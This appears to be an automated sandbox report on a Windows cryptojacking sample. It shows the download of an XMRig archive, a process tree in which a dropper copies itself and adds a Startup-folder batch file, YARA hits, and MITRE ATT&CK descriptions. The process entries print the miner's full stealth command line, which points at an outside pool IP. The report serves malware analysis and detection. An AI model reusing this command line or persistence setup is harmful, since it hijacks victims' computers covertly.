0 X-Timer: S1736350822.483868,VS0,VE45
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: 50 4b 03 04 14 00 00 00 00 00 5a 75 63 59 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 50 4b 03 04 0a 00 00 00 00 00 35 75 63 59 3d 16 f1 ff 3d 00 00 00 3d 00 00 00 1e 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 62 65 6e 63 68 6d 61 72 6b 5f 31 30 4d 2e 63 6d 64 40 65 63 68 6f 20 6f 66 66 0a 63 64 20 2f 64 20 22 25 7e 64 70 30 22 0a 78 6d 72 69 67 2e 65 78 65 20 2d 2d 62 65 6e 63 68 3d 31 30 4d 20 2d 2d 73 75 62 6d 69 74 0a 70 61 75 73 65 0a 50 4b 03 04 0a 00 00 00 00 00 35 75 63 59 d3 c2 d1 ca 3c 00 00 00 3c 00 00 00 1d 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 62 65 6e 63 68 6d 61 72 6b 5f 31 4d 2e 63 6d 64 40 65 63 68 6f 20 6f 66 66 0a 63 64 20 2f 64 20 22 25 7e 64 70 30 22 0a 78 6d 72 69 67 2e 65 78 Data Ascii: PKZucYxmrig-6.22.2/PK5ucY===xmrig-6.22.2/benchmark_10M.cmd@echo offcd /d "%~dp0"xmrig.exe --bench=10M --submitpausePK5ucY<<xmrig-6.22.2/benchmark_1M.cmd@echo offcd /d "%~dp0"xmrig.ex
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: 2c bc 65 82 94 30 37 e4 6f 02 0f a4 b1 a9 05 8b f3 5a 59 04 b1 63 69 69 5f 2c 87 ce 3f 84 0d 5f 26 0c 3c 23 4c 6b de de 5f ed 27 61 f0 4d 9c a1 b8 99 1d a0 3b 88 2a b4 58 83 41 94 41 09 9b ba 50 92 59 5f 48 84 0b ae e5 6a 52 5b ce 21 b3 73 36 69 27 7e ab 5c 70 bc 3d 76 ed 21 8c 19 cd 31 28 bc af 5c da eb 35 81 b8 ef 85 77 09 8f 05 85 ee e9 58 d6 62 9d 15 44 6e 6b 01 d5 de b1 98 38 4d aa e0 38 08 2c b0 ac 5a 26 16 ed 59 e1 2c 34 ab 89 ad 92 98 a1 e1 59 97 6a 83 f2 5d 80 7b d0 c1 f4 6d f7 a2 74 c4 60 1e 0d 14 62 81 e0 da 68 8e e8 7a 95 58 33 1f 94 4a 2b d6 d6 ed 66 12 7a 12 f6 de ff 91 d5 87 bd ee 9b 0b c3 3f b1 7f ac d3 70 6e c2 2d 39 3a 41 99 ff a8 bf 0e fb e3 93 a3 d1 66 73 27 be e4 83 1a e9 e2 76 dc 1f df 3f cd fb 43 f4 8f 9b d1 d5 e6 c6 1f 7f 7a 1a 1c Data Ascii: ,e07oZYcii_,?_&<#Lk_'aM;*XAAPY_HjR[!s6i'~\p=v!1(\5wXbDnk8M8,Z&Y,4Yj]{mt`bhzX3J+fz?pn-9:Afs'v?Cz
2025-01-08 15:40:22 UTC	1357	IN	Data Raw: 6a c7 08 d4 aa 9e e4 92 2d 50 8a af b8 53 67 4e 58 a1 8a 55 97 a6 43 7b 02 83 0b 12 d1 e2 de fb f5 fe c9 aa cf 26 75 05 2b c1 80 2b 02 b6 55 41 07 37 a5 c8 84 4a 3d 89 a5 3c 97 4d c6 9a a1 42 28 93 29 57 ba 3e f6 87 c7 f9 ba 5a 8a 47 ec fe 01 50 4b 03 04 14 00 00 00 08 00 35 75 63 59 ce 31 a4 ec fc 01 00 00 35 03 00 00 22 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 73 6f 6c 6f 5f 6d 69 6e 65 5f 65 78 61 6d 70 6c 65 2e 63 6d 64 6d 52 c1 72 da 30 10 3d 87 af d8 66 a6 d3 4b 70 a0 43 5a f0 64 72 08 50 4a 02 0d 43 6b 12 b8 64 84 b5 c6 0a b2 e4 58 72 01 1f fa ed 5d c9 21 49 67 3a a3 c3 6a f5 f6 e9 bd 27 85 21 0c f7 2c cb 25 c2 9a d9 38 85 44 50 99 e8 02 32 a1 84 da c0 54 2b 2c 34 18 2d 75 23 0c 69 c1 37 5d 64 cc ba f2 64 9f 15 62 13 e0 1e a1 a9 e1 52 69 8e Data Ascii: j-PSgNXUC{&u++UA7J=<MB()W>ZGPK5ucY15"xmrig-6.22.2/solo_mine_example.cmdmRr0=fKpCZdrPJCkdXr]!Ig:j'!,%8DP2T+,4-u#i7]ddbRi
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: a4 56 5f af 96 ab 5f 0b 11 58 88 25 32 c3 54 c4 89 4c 86 8a ec 6a 30 37 98 98 b1 c9 80 c8 7a 43 64 65 d7 20 83 25 2d 80 e2 8d a0 7a 34 70 26 b1 e4 1e 00 e2 8d d0 62 c9 f5 1c 44 54 2c e5 2e 40 58 66 b2 84 da 9b be a6 f9 04 e3 26 b1 ad 72 60 72 84 fa ab 08 59 77 0d 3c 19 b6 cb 20 9c 69 be 58 f2 63 a0 6e 19 86 83 9e 47 d0 64 0e ba 0b 41 d3 00 ca a0 2f 4b 47 80 e3 b2 4c 04 98 2d 6b 45 3a 8b 12 8c 5b 18 02 04 e3 66 b1 94 08 30 14 a0 88 2c 07 59 0b 96 99 38 4b 42 2c b9 10 74 46 da 92 b3 01 82 8c 9e b2 0a 8c fe 92 89 1a 62 01 c6 bb 21 63 d0 65 4a 7e 25 96 e5 22 6e c7 6a 22 32 63 55 70 83 5f 00 7f e8 2d ea d7 8d a5 48 e3 ad 3f d1 e8 89 34 d6 72 1b 59 bc 6f 41 32 62 a2 88 6d fc 48 80 0d 5d e5 f0 ad 64 db 20 5e 08 8d 1a 1e 0c 7a 19 c4 44 0d f3 bc 48 43 59 30 f9 87 Data Ascii: V__X%2TLj07zCde %-z4p&bDT,.@Xf&r`rYw< iXcnGdA/KGL-kE:[f0,Y8KB,tFb!ceJ~%"nj"2cUp_-H?4rYoA2bmH]d ^zDHCY0
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: 86 1a 64 4e 0d 8f 08 23 31 48 2e a4 c8 28 12 1d 7c 36 a9 40 d9 50 cd 69 24 3f 06 c9 35 3a dc 9f 1a 46 0e b0 23 53 42 21 a8 e4 1b df 82 b4 9e 1c 40 82 a0 73 80 63 41 02 9d 67 48 4a f3 ba 30 c2 6c 28 64 c6 2a 0a 39 00 7c 03 73 65 20 2f 31 08 6a e0 ca 7f d7 10 c3 63 1f be 8a 12 ee 17 61 43 75 8d f0 43 38 5e 80 63 3f 8d de 86 b6 25 99 45 05 9b 87 90 02 42 2d 37 42 10 85 41 a5 87 d2 28 61 9a a4 8d a0 55 0b 22 fa 85 b9 92 18 66 51 74 0b f0 e9 c5 2c da 31 28 88 4e 62 40 d2 08 df fa 67 3e 91 60 a7 09 de a1 d0 38 9f 8f 8f b9 0f 3d 82 14 40 0e 22 07 f8 84 f8 51 02 c3 48 34 e8 ff e5 7f a8 a0 38 9f e6 64 41 38 cd e4 4f 7d e6 fb 99 2f 80 01 a9 02 60 be e0 5b 9c 37 cf 4c 7d 08 4f 17 3c dd 21 57 c8 07 3c 2d 21 17 80 d9 40 8e 90 03 a0 6d c0 d3 0a e0 48 39 8b 79 3d 89 e8 Data Ascii: dN#1H.(\|6@Pi$?5:F#SB!@scAgHJ0l(d*9\|se /1jcaCuC8^c?%EB-7BA(aU"fQt,1(Nb@g>`8=@"QH48dA8O}/`[7L}O<!W<-!@mH9y=
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: 9a 7c 37 cc 5d ed cc f5 8f 71 6d 11 72 c5 ab 8e be 7e 98 70 2a 37 e3 f3 a7 00 d6 c7 98 eb 9e db 1e ce 0d 33 ae d3 d7 1b 09 75 eb 5e 60 a5 79 53 a4 25 f0 84 9d a3 7a fb 38 79 91 3a 3b 67 35 2c 18 2b 62 e8 a3 8a a2 3d 99 c5 56 35 8e 1d 4c 5b f7 b1 69 d2 b7 95 18 ec 17 ff f4 b2 c0 69 5b 97 32 89 50 d4 9b 45 16 a1 89 9b 18 e9 25 82 af 7c b6 1f f8 40 5b a7 d0 e9 19 9d dc 4c a9 d6 f0 f3 dc ff 86 f6 61 ac a2 7f 79 b8 6e 90 f7 49 a7 d0 1d 57 3c 97 3c 5a 30 7b cb a9 6c 93 f7 0d 36 fb f1 4b c2 cc d9 9e 6a b3 1c 8a 8c ec db 0f e9 8a 1c 0b b4 69 d6 5e b8 fa c4 78 42 90 99 c9 67 10 c0 03 20 80 bb b8 01 3c 95 b1 c6 e3 8e 69 2a ce 0c e0 d5 7f 71 00 83 4d 9d 0a 60 7e 17 2a 95 81 84 ee 1c 58 6e 2a d0 66 4d 13 46 1a bf 06 ad 0e 5e 1b bf 14 af 03 83 02 82 16 af 0b e3 b5 f5 Data Ascii: \|7]qmr~p73u^`yS%z8y:;g5,+b=V5L[ii[2PE%\|@[LaynIW<<Z0{l6Kji^xBg <iqM`~XnfMF^
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: b0 d1 e5 ed 82 da f0 fd 7c cb fa 4a 6c d0 da e4 36 5e b3 9d d7 ea 9f d4 1f c5 b6 ec 70 9a 73 37 39 bc b1 4e d1 65 37 29 5f 72 fd d9 d3 3d c1 ea 5a 4a 31 c7 16 3b 17 4c a4 38 aa 99 10 0f 25 2c 28 9a 7c 15 b7 31 af d9 b2 6b 9f 92 cb 96 de 1c d6 c4 a3 6b b8 96 93 5b 9c 0b b5 82 8c 4b 97 74 2d d9 9e 6e bf 59 d6 50 79 e1 e7 7b 65 e1 a4 84 6b fd bd b2 b6 03 95 63 8c de e4 67 2e 1a c7 8d 43 26 8c 57 d6 a0 dc 92 b3 b4 eb 73 ae 6f 0f 80 8b f6 77 ce cf 9d 2c d5 ac f9 1d 8b 71 ef 81 f2 41 a9 e6 cf e7 5d 4f 8a c3 89 18 31 10 fb 63 3f c4 be 78 f6 70 62 ce 8c d5 fa 77 bc 6d a7 4e ed da e0 8c 6e f8 43 56 e0 92 30 15 2f 09 4b 4c 69 12 fc ae 09 bf 08 56 9f b2 73 de 34 f5 6e e4 70 12 ce 95 e1 17 1e 81 84 33 21 8a 11 02 4e f6 8c 68 44 78 fa 71 7e 2e 03 c8 d1 a7 c4 82 a8 a6 Data Ascii: \|Jl6^ps79Ne7)_r=ZJ1;L8%,(\|1kk[Kt-nYPy{ekcg.C&Wsow,qA]O1c?xpbwmNnCV0/KLiVs4np3!NhDxq~.
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: c7 be 89 ee 30 d1 58 24 96 a7 ae f8 3c 7d 9b fc a9 df 3d 2f 0c 32 10 25 3d 3a d1 77 b1 5d 29 2d c3 70 fd ab d9 89 ad 92 19 bb 3a 03 08 03 9b de 9f a9 0a 93 6e 31 90 3c bd 43 c8 9f 2f ed fe 23 8b 38 f1 a3 4e 2a 2c df 7b bc 63 5e 47 a4 2a 62 dc 69 42 b9 cf cf 7f e1 8d c8 24 ed e7 9d 7b f8 3e ff 49 db d5 0f 2e 1a 06 1b 5f 60 c0 89 bc 71 20 47 04 4f e5 08 41 3f a1 b8 50 08 29 72 33 53 44 dc b4 f0 5b e5 fa f5 7d 8d 95 14 5c ed c7 09 61 06 95 f2 f5 ae c0 0f ee 0a a4 c0 70 2a 25 10 af 08 cf 9d 8a 52 69 7b 72 00 8d 4a a7 06 81 5b 02 95 16 41 a5 f9 31 c8 a0 87 3a bc 60 2a 24 71 d3 db 03 49 38 77 12 0d f9 09 0c 91 9a 3a 9a 70 f2 c3 52 58 4f 5b 07 af 0f c3 7a 78 24 3f 70 49 3c 42 fe f3 ae 34 bf 95 13 ee 88 3e cb cb e8 3c f4 c4 71 db 96 cf a3 ac 24 d5 d0 e7 44 a5 51 Data Ascii: 0X$<}=/2%=:w])-p:n1<C/#8N,{c^GbiB${>I._`q GOA?P)r3SD[}\ap%Ri{rJ[A1:`$qI8w:pRXO[zx$?pI<B4><q$DQ
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: a5 cd 92 5b 94 d4 2b 11 cf fb 71 69 75 6c fe 41 9a 63 90 d2 35 86 72 59 fe 32 4f c1 1b 75 2b 9d 67 63 1c ba 46 7c 2b d7 9a d4 77 46 df 90 73 8f 7d 97 16 d5 bd dd d7 3d bb 9d af 53 74 b2 e2 42 dd b6 32 5a 6f 92 88 e8 d6 15 1b 29 dd 52 c7 4d 4b 12 42 ca fb af 9f 33 19 22 c7 bf 70 09 ec fe 90 74 c3 ca 5d d8 f3 88 d9 ab 0f 77 d4 f4 9c cd 1c 0f 7f 5a 51 32 a6 57 bd a8 b4 79 27 39 6c bd 62 f7 97 09 ac d3 22 61 47 a9 e7 89 91 d5 75 b6 93 68 6b fd 72 fc 85 d8 da 87 ed 78 23 73 4b 95 83 89 e8 1e 70 55 ef fe be 7a 7c f8 44 74 33 60 9d 43 7c 20 21 fe df 70 45 ff e1 8b c1 74 97 48 44 c9 c0 b2 d3 5d 40 e8 1b c1 8f 82 e7 7e 6f e1 c5 8b 71 7e 8c d3 d7 06 9f f9 75 60 1d 03 cf 9f fc a3 9e fa 49 ed d1 b0 45 76 c3 aa 48 72 db 4d a1 83 6d ce 31 4b e1 84 2a 3e a1 af 52 e2 68 Data Ascii: [+qiulAc5rY2Ou+gcF\|+wFs}=StB2Zo)RMKB3"pt]wZQ2Wy'9lb"aGuhkrx#sKpUz\|Dt3`C\| !pEtHD]@~oq~u`IEvHrMm1K*>Rh
2025-01-08 15:40:22 UTC	1378	IN	Data Raw: 3c 39 d9 46 f1 9a 09 42 03 7a 2b 68 32 f1 70 4f ba ed f6 c9 b7 a2 d5 6c 59 bf f8 d0 8b 75 a8 78 65 c3 6f 42 82 33 7a bf ac 27 5f 9a cf 50 ad b6 47 2e b4 f0 76 b5 48 b5 0f 80 08 ab 0d 08 6a 74 9b ac f5 76 cb d2 ab 5f 91 eb 82 35 fb 65 fd da 37 5f ac 43 5d 3d d5 df 2b 4a b5 93 51 4e 4f 05 fa b5 7f 44 aa 35 e5 82 25 4b d9 bc 99 60 15 e9 ba a8 54 7b 3f 9e 84 ef 0b d4 bb 80 96 7c e9 c5 ce e0 1a 1b 1b 7d b4 cd e8 5c 31 9e e8 95 81 f1 44 33 f7 ff 3a 44 13 75 0d fa c1 90 df 3a 1d 8d ca 9a cd f8 e3 1f 30 a7 41 cc 99 7e 71 47 60 a9 10 f8 ae 28 97 45 e5 d0 47 49 b2 76 dc 68 c3 6c a9 fa a5 af 06 88 0a cd 75 bb a5 25 63 a9 47 ff 21 bb 73 b7 a2 a7 8f 34 1e 78 73 02 1a ab 16 65 ed b0 f1 2b 14 56 b4 6e 90 eb 62 41 d1 87 8d 94 b5 90 ec 6f b2 53 3e 06 ff 41 cd 66 59 3c 24 Data Ascii: <9FBz+h2pOlYuxeoB3z'_PG.vHjtv_5e7_C]=+JQNOD5%K`T{?\|}\1D3:Du:0A~qG`(EGIvhlu%cG!s4xse+VnbAoS>AfY<$

Target ID:	0
Start time:	10:40:14
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\pTVKHqys2h.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\pTVKHqys2h.exe"
Imagebase:	0x7ff767060000
File size:	8'126'322 bytes
MD5 hash:	7D6B277566CD13C79FC985CD532837AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:40:24
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Temp\System\process.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background
Imagebase:	0x7ff6d9860000
File size:	9'498'112 bytes
MD5 hash:	CB166D49CE846727ED70134B589B0142
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000000.2172935543.00007FF6DA481000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.3312372675.00000188D6595000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, Author: unknown Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000002.00000000.2172219039.00007FF6D9861000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	10:40:24
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:40:30
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\System32\config.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\System32\config.exe"
Imagebase:	0x7ff747860000
File size:	8'126'322 bytes
MD5 hash:	7D6B277566CD13C79FC985CD532837AE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 16%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:40:39
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\System32\config.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\System32\config.exe"
Imagebase:	0x7ff747860000
File size:	8'126'322 bytes
MD5 hash:	7D6B277566CD13C79FC985CD532837AE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:40:47
Start date:	08/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat" "
Imagebase:	0x7ff7368b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:40:47
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:40:47
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Temp\System\process.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background
Imagebase:	0x7ff6d9860000
File size:	9'498'112 bytes
MD5 hash:	CB166D49CE846727ED70134B589B0142
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.3312672331.000001BA354A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000000.2397228619.00007FF6DA481000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000009.00000000.2396664069.00007FF6D9861000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:40:47
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FF7670613D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174753156.00007FF767061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767060000, based on PE: true

Associated: 00000000.00000002.2174739709.00007FF767060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175002330.00007FF767497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175016862.00007FF767498000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175030601.00007FF76749B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175043524.00007FF76749C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175056207.00007FF76749D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175139281.00007FF767609000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175151456.00007FF76760B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175162931.00007FF76760E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff767060000_pTVKHqys2h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae5a909265729cfa2b73b91af618426fb11bbe008c86be6cfff7649148ee5f
Instruction ID: eaa13a71fe98e536128a040acb8f0dffc587b62a0725aa3176e1a4a6abba91d7
Opcode Fuzzy Hash: 6cae5a909265729cfa2b73b91af618426fb11bbe008c86be6cfff7649148ee5f
Instruction Fuzzy Hash: 29B01270A0528DC4F3013F01D86125873206B05BC0FC08030C40C57353CF7C54424730

Analysis Process: config.exePID: 940, Parent PID: 1028COMMON

Executed Functions

Function 00007FF7478613D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2260934288.00007FF747861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF747860000, based on PE: true

Associated: 00000005.00000002.2260919789.00007FF747860000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2261192729.00007FF747C97000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2261210545.00007FF747C98000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2261227334.00007FF747C9B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2261244625.00007FF747C9C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2261264017.00007FF747C9D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2261377921.00007FF747E09000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2261393122.00007FF747E0B000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2261408074.00007FF747E0E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff747860000_config.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae5a909265729cfa2b73b91af618426fb11bbe008c86be6cfff7649148ee5f
Instruction ID: 5bcec68f279b1f6d931425f3f795eedfdc6f0e05cfe23799a8275f4d1c61c490
Opcode Fuzzy Hash: 6cae5a909265729cfa2b73b91af618426fb11bbe008c86be6cfff7649148ee5f
Instruction Fuzzy Hash: DEB012B0D1D24DD4E3013F01D84125876206F06B40FC19030C40C07353CEBC50524B30

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

